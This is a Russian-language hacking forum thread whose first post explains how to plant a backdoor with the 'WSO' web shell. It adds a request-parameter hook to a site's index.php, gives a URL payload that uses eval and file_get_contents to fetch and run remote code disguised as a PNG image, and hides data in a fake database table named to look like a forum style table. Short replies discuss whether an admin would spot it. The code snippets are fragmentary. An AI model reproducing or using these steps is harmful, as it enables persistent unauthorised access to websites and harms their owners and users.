![]() |
Используем "WSO Web Shel"
Отправляемся к файлу index.php , и дописываем вредоносный код: Код:
if (isset($_REQUEST['l']))Код:
http://www.ru/index.php?l=eval(file_get_contents(%27http://www.ru/screen.png%27))#Код:
create table xf_style_property_css (http://i.imgur.com/TBUUmhA.png Дописываем код: Код:
$DataBaseConnector = mysql_connect('localhost', 'Имя БД', 'Пароль от БД');Выполняем команду получения списка: (Сейчас он пустой ) Код:
SELECT * FROM `xf_style_property_css` |
|
Я просто подумал. Потом админ сделает show databases;
И.... |
не, на какой-то лютый ресерч не тянет
|
Цитата:
|
| Время: 18:45 |